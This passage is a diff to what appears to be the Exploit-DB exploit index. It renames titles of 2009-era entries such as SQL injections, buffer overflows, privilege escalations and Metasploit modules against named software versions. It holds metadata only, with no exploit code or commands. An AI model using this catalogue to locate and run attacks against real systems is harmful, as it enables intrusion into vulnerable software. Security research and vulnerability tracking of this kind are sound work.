Service Stack Buffer Overflow (PoC)",2009-08-31,"fl0 fl0w",windows,dos,0 -9550,platforms/windows/local/9550.txt,"Hex Workshop 4.23/5.1/6.0 - '.hex' Universal Local Buffer Overflow Exploits (SEH)",2009-08-31,hack4love,windows,local,0 +9550,platforms/windows/local/9550.txt,"Hex Workshop 4.23/5.1/6.0 - '.hex' Universal Local Buffer Overflows (SEH)",2009-08-31,hack4love,windows,local,0 9551,platforms/windows/local/9551.py,"Media Jukebox 8 - '.pls' Universal Local Buffer Exploit (SEH)",2009-08-31,mr_me,windows,local,0 9552,platforms/php/webapps/9552.txt,"Re-Script 0.99 Beta - (listings.php op) SQL Injection",2009-08-31,Mr.SQL,php,webapps,0 9553,platforms/php/webapps/9553.txt,"BandCMS 0.10 - news.php Multiple SQL Injection",2009-08-31,Affix,php,webapps,0 @@ -9022,7 +9023,7 @@ id,file,description,date,author,platform,type,port 9555,platforms/php/webapps/9555.txt,"Mybuxscript PTC-BUX - 'spnews.php' SQL Injection",2009-08-31,HxH,php,webapps,0 9556,platforms/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a - Code Execution",2009-08-31,flyh4t,php,webapps,0 9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 (Windows 2000 SP4) - FTP Server Remote Stack Overflow",2009-09-01,muts,windows,remote,21 -9560,platforms/windows/local/9560.txt,"Soritong MP3 Player 1.0 - '.m3u' / UI.txt Universal Local Buffer Overflow Exploits",2009-09-01,hack4love,windows,local,0 +9560,platforms/windows/local/9560.txt,"Soritong MP3 Player 1.0 - '.m3u' / UI.txt Universal Local Buffer Overflows",2009-09-01,hack4love,windows,local,0 9561,platforms/windows/dos/9561.py,"AIMP2 Audio Converter 2.53b330 - '.pls' / '.m3u' Unicode Crash (PoC)",2009-09-01,mr_me,windows,dos,0 9562,platforms/asp/webapps/9562.txt,"JSFTemplating / Mojarra Scales / GlassFish - File Disclosure",2009-09-01,"SEC Consult",asp,webapps,0 9563,platforms/php/webapps/9563.txt,"Joomla Component com_artportal 1.0 - (portalid) SQL Injection",2009-09-01,"599eme Man",php,webapps,0 @@ -9043,7 +9044,7 @@ id,file,description,date,author,platform,type,port 9578,platforms/php/webapps/9578.txt,"PHP Live! 3.3 - (deptid) SQL Injection",2009-09-02,v3n0m,php,webapps,0 9579,platforms/windows/local/9579.txt,"Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 - Collab getIcon Universal Exploit",2009-09-03,kralor,windows,local,0 9580,platforms/windows/local/9580.pl,"Hamster Audio Player 0.3a - (Associations.cfg) Local Buffer Exploit (SEH) (2)",2009-09-03,hack4love,windows,local,0 -9581,platforms/windows/local/9581.pl,"SAP Player 0.9 - '.m3u' Universal Local Buffer Overflow Exploit (SEH)",2009-09-03,PLATEN,windows,local,0 +9581,platforms/windows/local/9581.pl,"SAP Player 0.9 - '.m3u' Universal Local Buffer Overflow (SEH)",2009-09-03,PLATEN,windows,local,0 9582,platforms/php/webapps/9582.txt,"FreeSchool 1.1.0 - Multiple Remote File Inclusion",2009-09-03,"cr4wl3r ",php,webapps,0 9583,platforms/php/webapps/9583.txt,"PHPope 1.0.0 - Multiple Remote File Inclusion",2009-09-03,"cr4wl3r ",php,webapps,0 9584,platforms/windows/dos/9584.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow PoC (1)",2009-09-03,"expose 0day",windows,dos,0 @@ -9051,7 +9052,7 @@ id,file,description,date,author,platform,type,port 9586,platforms/windows/remote/9586.py,"SIDVault 2.0e - Windows Remote Buffer Overflow",2009-09-03,blake,windows,remote,389 9587,platforms/windows/dos/9587.txt,"Microsoft IIS 5.0/6.0 FTP Server - (Stack Exhaustion) Denial of Service",2009-09-04,kingcope,windows,dos,0 9588,platforms/php/webapps/9588.txt,"Mambo Component com_zoom - 'catid' Blind SQL Injection",2009-09-04,boom3rang,php,webapps,0 -9589,platforms/windows/local/9589.pl,"OtsTurntables 1.00.027 - '.m3u' / '.ofl' Local Universal Buffer Overflow Exploit (SEH)",2009-09-04,hack4love,windows,local,0 +9589,platforms/windows/local/9589.pl,"OtsTurntables 1.00.027 - '.m3u' / '.ofl' Local Universal Buffer Overflow (SEH)",2009-09-04,hack4love,windows,local,0 9590,platforms/php/webapps/9590.c,"ZeroBoard 4.1 pl7 - now_connect() Remote Code Execution",2009-09-04,SpeeDr00t,php,webapps,0 9591,platforms/php/webapps/9591.txt,"Ticket Support Script - 'ticket.php' Arbitrary File Upload",2009-09-04,InjEctOr5,php,webapps,0 9592,platforms/windows/remote/9592.rb,"SIDVault 2.0e - Windows Remote Buffer Overflow (Metasploit)",2009-09-04,His0k4,windows,remote,389 @@ -9067,7 +9068,7 @@ id,file,description,date,author,platform,type,port 9602,platforms/php/webapps/9602.pl,"Joomla Component TPDugg 1.1 - Blind SQL Injection",2009-09-09,NoGe,php,webapps,0 9603,platforms/php/webapps/9603.txt,"Model Agency Manager Pro - (user_id) SQL Injection",2009-09-09,R3d-D3V!L,php,webapps,0 9604,platforms/php/webapps/9604.txt,"Joomla Component com_joomloc - 'id' SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0 -9605,platforms/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution Exploit",2009-09-09,StAkeR,php,webapps,0 +9605,platforms/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution",2009-09-09,StAkeR,php,webapps,0 9606,platforms/windows/dos/9606.pl,"Safari 3.2.3 (Windows/x86) - JavaScript (eval) Remote Denial of Service",2009-09-09,"Jeremy Brown",windows,dos,0 9607,platforms/windows/dos/9607.pl,"Ipswitch WS_FTP 12 Professional - Remote Format String (PoC)",2009-09-09,"Jeremy Brown",windows,dos,0 9608,platforms/linux/local/9608.c,"GemStone/S 6.3.1 - (stoned) Local Buffer Overflow",2009-09-09,"Jeremy Brown",linux,local,0 @@ -9077,8 +9078,8 @@ id,file,description,date,author,platform,type,port 9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 - (cacheId) Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps,0 9613,platforms/windows/remote/9613.py,"FTPShell Client 4.1 RC2 - Remote Buffer Overflow (Universal)",2009-09-09,His0k4,windows,remote,0 9615,platforms/windows/remote/9615.jar,"Pidgin MSN 2.5.8 - Remote Code Execution",2009-09-09,"Pierre Nogues",windows,remote,0 -9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow / Null pointer Dereference",2009-09-09,"Core Security",windows,dos,0 -9618,platforms/windows/local/9618.php,"Millenium MP3 Studio - (pls/mpf/m3u) Local Universal Buffer Overflow Exploits (SEH)",2009-09-09,hack4love,windows,local,0 +9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow / Null Pointer Dereference",2009-09-09,"Core Security",windows,dos,0 +9618,platforms/windows/local/9618.php,"Millenium MP3 Studio - (pls/mpf/m3u) Local Universal Buffer Overflows (SEH)",2009-09-09,hack4love,windows,local,0 9619,platforms/windows/local/9619.pl,"jetAudio 7.1.9.4030 plus - vx(asx/wax/wvx) Universal Local Buffer Overflow (SEH)",2009-09-09,hack4love,windows,local,0 9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 - '.mid' Integer Overflow (PoC)",2009-09-09,PLATEN,windows,dos,0 9621,platforms/windows/dos/9621.txt,"Kolibri+ WebServer 2 - (Get Request) Denial of Service",2009-09-10,"Usman Saeed",windows,dos,0 @@ -9104,7 +9105,7 @@ id,file,description,date,author,platform,type,port 9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Privilege Escalation (3)",2009-09-11,"Ramon Valle",linux,local,0 9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-Length Tunnel-Password Denial of Service",2009-09-11,"Matthew Gillespie",multiple,dos,1812 9643,platforms/windows/remote/9643.txt,"kolibri+ WebServer 2 - Directory Traversal",2009-09-11,"Usman Saeed",windows,remote,0 -9644,platforms/windows/remote/9644.py,"Kolibri+ WebServer 2 - (GET Request) Remote SEH Overwrite",2009-09-11,blake,windows,remote,80 +9644,platforms/windows/remote/9644.py,"Kolibri+ WebServer 2 - (GET Request) Remote Overwrite (SEH)",2009-09-11,blake,windows,remote,80 9645,platforms/aix/local/9645.sh,"IBM AIX 5.6/6.1 - _LIB_INIT_DBG Arbitrary File Overwrite via Libc Debug",2009-09-11,"Marco Ivaldi",aix,local,0 9646,platforms/hardware/dos/9646.php,"Siemens Gigaset SE361 WLAN - Remote Reboot Exploit",2009-09-11,crashbrz,hardware,dos,0 9647,platforms/php/webapps/9647.txt,"PHP-IPNMonitor - (maincat_id) SQL Injection",2009-09-11,noname,php,webapps,0 @@ -9120,20 +9121,20 @@ id,file,description,date,author,platform,type,port 9657,platforms/windows/dos/9657.pl,"httpdx Web Server 1.4 - (Host Header) Remote Format String Denial of Service",2009-09-14,"Pankaj Kohli",windows,dos,0 9658,platforms/hardware/remote/9658.txt,"Neufbox NB4-R1.5.10-MAIN - Persistent Cross-Site Scripting",2009-09-14,"599eme Man",hardware,remote,0 9659,platforms/windows/local/9659.cpp,"Portable E.M Magic Morph 1.95b - '.MOR' File Stack Buffer Overflow (PoC)",2009-09-14,"fl0 fl0w",windows,local,0 -9660,platforms/windows/remote/9660.pl,"Techlogica HTTP Server 1.03 - Arbitrary File Disclosure Exploit",2009-09-14,"ThE g0bL!N",windows,remote,0 +9660,platforms/windows/remote/9660.pl,"Techlogica HTTP Server 1.03 - Arbitrary File Disclosure",2009-09-14,"ThE g0bL!N",windows,remote,0 9661,platforms/windows/local/9661.c,"MP3 Studio 1.0 - '.m3u' Local Buffer Overflow",2009-09-14,dmc,windows,local,0 9662,platforms/windows/remote/9662.c,"IPSwitch IMAP Server 9.20 - Remote Buffer Overflow",2009-09-14,dmc,windows,remote,143 9663,platforms/windows/remote/9663.py,"Mozilla Firefox 2.0.0.16 - UTF-8 URL Remote Buffer Overflow",2009-09-14,dmc,windows,remote,0 9664,platforms/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - (Post-Authentication) Remote Denial of Service",2009-09-14,PLATEN,windows,dos,0 9665,platforms/php/webapps/9665.pl,"PHP Pro Bid - Blind SQL Injection",2009-09-14,NoGe,php,webapps,0 -9666,platforms/hardware/dos/9666.php,"Apple Safari IPhone - (using tel:) Remote Crash Exploit",2009-09-14,cloud,hardware,dos,0 +9666,platforms/hardware/dos/9666.php,"Apple Safari IPhone - (using tel:) Remote Crash",2009-09-14,cloud,hardware,dos,0 9667,platforms/windows/dos/9667.c,"Cerberus FTP Server 3.0.3 - Remote Denial of Service",2009-09-14,"Single Eye",windows,dos,0 9668,platforms/windows/dos/9668.txt,"Batch Picture Watemark 1.0 - '.jpg' Local Crash (PoC)",2009-09-14,the_Edit0r,windows,dos,0 9669,platforms/php/webapps/9669.txt,"Bs Counter 2.5.3 - (page) SQL Injection",2009-09-14,Bgh7,php,webapps,0 9670,platforms/windows/dos/9670.txt,"FotoTagger 2.12.0.0 - '.XML' Buffer Overflow (PoC)",2009-09-14,the_Edit0r,windows,dos,0 9671,platforms/windows/dos/9671.py,"Tuniac 090517c - '.pls' Local Crash (PoC)",2009-09-14,zAx,windows,dos,0 9672,platforms/windows/dos/9672.py,"PowerISO 4.0 - Local Buffer Overflow (PoC)",2009-09-14,Dr_IDE,windows,dos,0 -9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow Exploit (SEH)",2009-09-15,blake,windows,remote,6660 +9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH)",2009-09-15,blake,windows,remote,6660 9674,platforms/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - (Authentication Bypass) SQL Injection",2009-09-15,snakespc,php,webapps,0 9675,platforms/asp/webapps/9675.txt,"HotWeb Rentals - 'details.asp PropId' Blind SQL Injection",2009-09-15,R3d-D3V!L,asp,webapps,0 9676,platforms/windows/remote/9676.txt,"BRS Webweaver 1.33 - /Scripts Access Restriction Bypass",2009-09-15,"Usman Saeed",windows,remote,0 @@ -9148,8 +9149,8 @@ id,file,description,date,author,platform,type,port 9687,platforms/windows/local/9687.py,"SAP Player 0.9 - '.pla' Universal Local Buffer Overflow (SEH)",2009-09-15,mr_me,windows,local,0 9688,platforms/hardware/local/9688.txt,"NetAccess IP3 - (Post-Authentication) (ping option) Command Injection",2009-09-15,r00t,hardware,local,0 9689,platforms/windows/dos/9689.pl,"MP3 Collector 2.3 - '.m3u' Local Crash (PoC)",2009-09-15,zAx,windows,dos,0 -9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow Exploit (SEH) Universal",2009-09-15,hack4love,windows,remote,6660 -9691,platforms/windows/dos/9691.pl,"DJ Studio Pro 4.2 - '.pls' Local Crash Exploit",2009-09-15,prodigy,windows,dos,0 +9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH) Universal",2009-09-15,hack4love,windows,remote,6660 +9691,platforms/windows/dos/9691.pl,"DJ Studio Pro 4.2 - '.pls' Local Crash",2009-09-15,prodigy,windows,dos,0 9692,platforms/php/webapps/9692.txt,"iBoutique.MALL 1.2 - (cat) Blind SQL Injection",2009-09-15,InjEctOr5,php,webapps,0 9693,platforms/php/webapps/9693.txt,"Joomla Component com_djcatalog - SQL Injection / Blind SQL Injection",2009-09-15,"Chip d3 bi0s",php,webapps,0 9694,platforms/windows/remote/9694.txt,"NaviCOPA Web Server 3.01 - Source Code Disclosure",2009-09-16,Dr_IDE,windows,remote,0 @@ -9162,7 +9163,7 @@ id,file,description,date,author,platform,type,port 9701,platforms/windows/dos/9701.c,"Notepad++ 5.4.5 - Local .C/CPP Stack Buffer Overflow (PoC)",2009-09-16,"fl0 fl0w",windows,dos,0 9702,platforms/php/webapps/9702.txt,"Elite Gaming Ladders 3.2 - (platform) SQL Injection",2009-09-16,snakespc,php,webapps,0 9703,platforms/php/webapps/9703.txt,"phpPollScript 1.3 - (include_class) Remote File Inclusion",2009-09-16,"cr4wl3r ",php,webapps,0 -9704,platforms/windows/remote/9704.html,"Quiksoft EasyMail 6.0.3.0 - imap connect() ActiveX Buffer Overflow Exploit",2009-09-17,"Sebastian Wolfgarten",windows,remote,0 +9704,platforms/windows/remote/9704.html,"Quiksoft EasyMail 6.0.3.0 - imap connect() ActiveX Buffer Overflow",2009-09-17,"Sebastian Wolfgarten",windows,remote,0 9705,platforms/windows/remote/9705.html,"Quiksoft EasyMail 6 - (AddAttachment) Remote Buffer Overflow",2009-09-17,bmgsec,windows,remote,0 9706,platforms/php/webapps/9706.txt,"joomla Component com_album 1.14 - Directory Traversal",2009-09-17,DreamTurk,php,webapps,0 9707,platforms/windows/dos/9707.pl,"Ease Audio Cutter 1.20 - '.wav' Local Crash (PoC)",2009-09-17,zAx,windows,dos,0 @@ -9235,20 +9236,20 @@ id,file,description,date,author,platform,type,port 9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0 9843,platforms/multiple/remote/9843.txt,"Blender 2.34 / 2.35a / 2.4 / 2.49b - '.blend' Command Injection",2009-11-05,"Core Security",multiple,remote,0 9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1<2.4.37 / 2.6.1<2.6.32-rc5 - 'pipe.c' Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0 -9845,platforms/osx/dos/9845.c,"Apple Mac OS X 10.5.6/10.5.7 - ptrace mutex Denial of Service",2009-11-05,prdelka,osx,dos,0 +9845,platforms/osx/dos/9845.c,"Apple Mac OSX 10.5.6/10.5.7 - ptrace mutex Denial of Service",2009-11-05,prdelka,osx,dos,0 9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0 9849,platforms/php/webapps/9849.php,"PunBB Extension Attachment 1.0.2 - SQL Injection",2009-11-03,puret_t,php,webapps,0 9850,platforms/php/webapps/9850.txt,"Xerox Fiery Webtools - SQL Injection",2009-11-03,"Bernardo Trigo",php,webapps,0 9851,platforms/windows/remote/9851.pl,"Xion Audio Player 1.0 121 - '.m3u' Buffer Overflow (1)",2009-11-03,corelanc0d3r,windows,remote,0 9852,platforms/windows/dos/9852.py,"Home FTP Server 1.10.1.139 - 'SITE INDEX' Command Remote Denial of Service",2009-11-16,zhangmc,windows,dos,21 9853,platforms/windows/remote/9853.rb,"Symantec ConsoleUtilities - ActiveX Buffer Overflow (Metasploit)",2009-11-02,"Nikolas Sotiriu",windows,remote,0 -9854,platforms/php/webapps/9854.txt,"TFTgallery .13 - Directory Traversal Exploit",2009-11-02,blake,php,webapps,0 -9855,platforms/php/webapps/9855.txt,"Geeklog 1.6.0sr2 - Remote File Upload",2009-10-03,JaL0h,php,webapps,0 +9854,platforms/php/webapps/9854.txt,"TFTgallery .13 - Directory Traversal",2009-11-02,blake,php,webapps,0 +9855,platforms/php/webapps/9855.txt,"Geeklog 1.6.0sr2 - Arbitrary File Upload",2009-10-03,JaL0h,php,webapps,0 9856,platforms/asp/webapps/9856.txt,"Snitz Forums 2000 - Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,"Andrea Fabrizi",asp,webapps,0 9857,platforms/asp/webapps/9857.txt,"AfterLogic WebMail Pro 4.7.10 - Cross-Site Scripting",2009-10-05,"Sébastien Duquette",asp,webapps,0 9858,platforms/hardware/remote/9858.txt,"Riorey RIOS 4.7.0 - Hardcoded Password",2009-10-08,"Marek Kroemeke",hardware,remote,8022 -9859,platforms/freebsd/local/9859.c,"FreeBSD 6.4 - pipeclose()/knlist_cleardel() Race Condition Exploit",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 -9860,platforms/freebsd/local/9860.c,"FreeBSD 7.2 VFS/devfs - Race Condition Exploit",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 +9859,platforms/freebsd/local/9859.c,"FreeBSD 6.4 - pipeclose()/knlist_cleardel() Race Condition",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 +9860,platforms/freebsd/local/9860.c,"FreeBSD 7.2 VFS/devfs - Race Condition",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 9861,platforms/unix/webapps/9861.rb,"Nagios3 - statuswml.cgi Command Injection (Metasploit)",2009-10-30,"H D Moore",unix,webapps,0 9862,platforms/hardware/remote/9862.txt,"3Com OfficeConnect - Code Execution",2009-10-19,"Andrea Fabizi",hardware,remote,0 9863,platforms/php/webapps/9863.txt,"Achievo 1.3.4 - Cross-Site Scripting",2009-10-14,"Ryan Dewhurst",php,webapps,0 @@ -9303,14 +9304,14 @@ id,file,description,date,author,platform,type,port 9921,platforms/solaris/remote/9921.rb,"Solaris 8.0 - LPD Command Execution (Metasploit)",2001-08-31,"H D Moore",solaris,remote,515 9922,platforms/php/webapps/9922.txt,"Oscailt CMS 3.3 - Local File Inclusion",2009-10-28,s4r4d0,php,webapps,0 9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd - Heap Overflow (Metasploit)",2002-06-10,noir,solaris,remote,6112 -9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 < 2.2.8 (OS X) - trans2open Overflow (Metasploit)",2003-04-07,"H D Moore",osx,remote,139 -9925,platforms/osx/remote/9925.rb,"Apple QuickTime RTSP 10.4.0 < 10.5.0 (OS X) - Content-Type Overflow (Metasploit)",2009-10-28,anonymous,osx,remote,0 -9926,platforms/php/webapps/9926.rb,"Joomla 1.5.12 - tinybrowser Remote File Upload / Execute",2009-07-22,spinbad,php,webapps,0 -9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0 / 10.4.8 (OS X) - UPnP Location Overflow (Metasploit)",2009-10-28,anonymous,osx,remote,0 -9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server 5.3.2 (OS X) - USER Overflow (Metasploit)",2004-07-13,ddz,osx,remote,21 -9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 (OS X) - Image Attachment Command Execution (Metasploit)",2006-03-01,"H D Moore",osx,remote,25 -9930,platforms/osx/remote/9930.rb,"Arkeia Backup Client 5.3.3 (OS X) - Type 77 Overflow (Metasploit)",2005-02-18,"H D Moore",osx,remote,0 -9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 (OS X) - LoginEXT PathName Overflow (Metasploit)",2004-03-03,"H D Moore",osx,remote,548 +9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)",2003-04-07,"H D Moore",osx,remote,139 +9925,platforms/osx/remote/9925.rb,"Apple QuickTime RTSP 10.4.0 < 10.5.0 (OSX) - Content-Type Overflow (Metasploit)",2009-10-28,anonymous,osx,remote,0 +9926,platforms/php/webapps/9926.rb,"Joomla 1.5.12 - tinybrowser Arbitrary File Upload / Execute",2009-07-22,spinbad,php,webapps,0 +9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0 / 10.4.8 (OSX) - UPnP Location Overflow (Metasploit)",2009-10-28,anonymous,osx,remote,0 +9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server 5.3.2 (OSX) - USER Overflow (Metasploit)",2004-07-13,ddz,osx,remote,21 +9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 (OSX) - Image Attachment Command Execution (Metasploit)",2006-03-01,"H D Moore",osx,remote,25 +9930,platforms/osx/remote/9930.rb,"Arkeia Backup Client 5.3.3 (OSX) - Type 77 Overflow (Metasploit)",2005-02-18,"H D Moore",osx,remote,0 +9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 (OSX) - LoginEXT PathName Overflow (Metasploit)",2004-03-03,"H D Moore",osx,remote,548 9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit)",2007-01-21,toto,novell,remote,0 9933,platforms/php/webapps/9933.txt,"PHP168 6.0 - Command Execution",2009-10-28,"Securitylab Security Research",php,webapps,0 9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,multiple,remote,0 @@ -9327,7 +9328,7 @@ id,file,description,date,author,platform,type,port 9946,platforms/multiple/remote/9946.rb,"Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution (Metasploit)",2006-07-25,"H D Moore",multiple,remote,0 9947,platforms/windows/remote/9947.rb,"Mozilla Suite/Firefox < 1.0.5 - compareTo Code Execution (Metasploit)",2005-07-13,"H D Moore",windows,remote,0 9948,platforms/multiple/remote/9948.rb,"Sun Java Runtime and Development Kit 6 Update 10 - Calendar Deserialization Exploit (Metasploit)",2008-12-03,sf,multiple,remote,0 -9949,platforms/multiple/remote/9949.rb,"Firefox 3.5 - escape Memory Corruption Exploit (Metasploit)",2006-07-14,"H D Moore",multiple,remote,0 +9949,platforms/multiple/remote/9949.rb,"Firefox 3.5 - escape Memory Corruption (Metasploit)",2006-07-14,"H D Moore",multiple,remote,0 9950,platforms/linux/remote/9950.rb,"Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow (Metasploit)",2007-05-14,"Adriano Lima",linux,remote,0 9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x / 3.x - NTLM Buffer Overflow (Metasploit)",2004-06-08,skape,multiple,remote,3129 9952,platforms/linux/remote/9952.rb,"Poptop < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit)",2003-04-09,spoonm,linux,remote,1723 @@ -9339,12 +9340,12 @@ id,file,description,date,author,platform,type,port 9958,platforms/jsp/webapps/9958.txt,"Pentaho 1.7.0.1062 - Cross-Site Scripting / Information Disclosure",2009-10-15,antisnatchor,jsp,webapps,0 9961,platforms/php/webapps/9961.txt,"phpCMS 2008 - file Disclosure",2009-10-19,"Securitylab Security Research",php,webapps,0 16007,platforms/php/webapps/16007.txt,"AneCMS 1.3 - Persistent Cross-Site Scripting",2011-01-17,Penguin,php,webapps,0 -9962,platforms/php/webapps/9962.txt,"Piwik 1357 2009-08-02 - File Upload / Code Execution",2009-10-19,boecke,php,webapps,0 +9962,platforms/php/webapps/9962.txt,"Piwik 1357 2009-08-02 - Arbitrary File Upload / Code Execution",2009-10-19,boecke,php,webapps,0 9963,platforms/asp/webapps/9963.txt,"QuickTeam 2.2 - SQL Injection",2009-10-14,"drunken danish rednecks",asp,webapps,0 9964,platforms/php/webapps/9964.txt,"RunCMS 2m1 - store() SQL Injection",2009-10-26,bookoo,php,webapps,0 9965,platforms/php/webapps/9965.txt,"RunCMS 2ma - post.php SQL Injection",2009-10-26,bookoo,php,webapps,0 9966,platforms/windows/remote/9966.txt,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (1)",2009-11-02,"Nikolas Rangos",windows,remote,80 -9967,platforms/asp/webapps/9967.txt,"SharePoint 2007 - Team Services source code Disclosure",2009-10-26,"Daniel Martin",asp,webapps,0 +9967,platforms/asp/webapps/9967.txt,"SharePoint 2007 - Team Services Source Code Disclosure",2009-10-26,"Daniel Martin",asp,webapps,0 9969,platforms/multiple/dos/9969.txt,"Snort 2.8.5 - IPv6 Denial of Service",2009-10-23,"laurent gaffie",multiple,dos,0 9970,platforms/windows/local/9970.txt,"South River Technologies WebDrive 9.02 build 2232 - Privilege Escalation",2009-10-20,"bellick ",windows,local,0 9971,platforms/windows/local/9971.php,"Spider Solitaire - (PoC)",2009-10-15,SirGod,windows,local,0 @@ -9359,7 +9360,7 @@ id,file,description,date,author,platform,type,port 9981,platforms/hardware/webapps/9981.txt,"Websense Email Security - Cross-Site Scripting",2009-10-20,"Nikolas Sotiriu",hardware,webapps,0 9983,platforms/windows/local/9983.pl,"Xion Audio Player 1.0 121 - '.m3u' Buffer Overflow (2)",2009-10-16,"Dragon Rider",windows,local,0 9984,platforms/windows/local/9984.py,"xp-AntiSpy 3.9.7-4 - '.xpas' file Buffer Overflow",2009-10-26,Dr_IDE,windows,local,0 -9985,platforms/multiple/local/9985.txt,"Xpdf 3.01 - heap Overflow / null pointer Dereference",2009-10-17,"Adam Zabrocki",multiple,local,0 +9985,platforms/multiple/local/9985.txt,"Xpdf 3.01 - heap Overflow / Null Pointer Dereference",2009-10-17,"Adam Zabrocki",multiple,local,0 14273,platforms/linux/local/14273.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)",2010-07-08,"Kristian Erik Hermansen",linux,local,0 9987,platforms/multiple/dos/9987.txt,"ZoIPer 2.22 - Call-Info Remote Denial Of Service",2009-10-14,"Tomer Bitton",multiple,dos,5060 9988,platforms/windows/local/9988.txt,"Adobe Photoshop Elements - Active File Monitor Service Privilege Escalation",2009-10-29,"bellick ",windows,local,0 @@ -9368,7 +9369,7 @@ id,file,description,date,author,platform,type,port 9992,platforms/windows/remote/9992.txt,"AOL 9.1 SuperBuddy - ActiveX Control Remote code Execution",2009-10-01,Trotzkista,windows,remote,0 9993,platforms/multiple/remote/9993.txt,"Apache mod_perl 'Apache::Status' and 'Apache2::Status' - Cross-Site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0 9994,platforms/multiple/remote/9994.txt,"Apache Tomcat - Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",multiple,remote,0 -9995,platforms/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication Username Enumeration",2009-11-09,"D. Matscheko",multiple,remote,0 +9995,platforms/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication 'Username' Enumeration",2009-11-09,"D. Matscheko",multiple,remote,0 9997,platforms/multiple/remote/9997.txt,"Blender 2.49b - '.blend' Remote Command Execution",2009-11-09,"Fernando Russ",multiple,remote,0 9998,platforms/windows/remote/9998.c,"BulletProof FTP 2.63 b56 - Client Malformed '.bps' File Stack Buffer Overflow",2009-10-07,"Rafa De Sousa",windows,remote,21 9999,platforms/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 - Pre-Authentication Denial of Service",2009-09-30,"Francis Provencher",windows,dos,21 @@ -9386,7 +9387,7 @@ id,file,description,date,author,platform,type,port 10012,platforms/multiple/webapps/10012.py,"html2ps - 'include file' Server Side Include Directive Directory Traversal",2009-09-25,epiphant,multiple,webapps,0 10013,platforms/jsp/webapps/10013.txt,"Hyperic HQ 3.2 < 4.2-beta1 - Multiple Cross-Site Scripting",2009-10-02,CoreLabs,jsp,webapps,0 10016,platforms/php/webapps/10016.pl,"JForJoomla Jreservation Joomla! Component 1.5 - 'pid' Parameter SQL Injection",2009-11-10,"Chip d3 bi0s",php,webapps,0 -10017,platforms/linux/dos/10017.c,"Linux Kernel 2.6.x - 'fput()' NULL Pointer Dereference Local Denial of Service",2009-11-09,"David Howells",linux,dos,0 +10017,platforms/linux/dos/10017.c,"Linux Kernel 2.6.x - 'fput()' Null Pointer Dereference Local Denial of Service",2009-11-09,"David Howells",linux,dos,0 10018,platforms/linux/local/10018.sh,"Linux Kernel 2.6.32 - 'pipe.c' Privilege Escalation (4)",2009-11-12,"Earl Chew",linux,local,0 10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007 / 2007 SP2 - open_marker_file Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 10020,platforms/linux/remote/10020.rb,"Borland Interbase 2007 / 2007 sp2 - jrd8_create_database Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 @@ -9456,7 +9457,7 @@ id,file,description,date,author,platform,type,port 10085,platforms/jsp/webapps/10085.txt,"toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities",2009-11-07,"Alberto Trivero",jsp,webapps,0 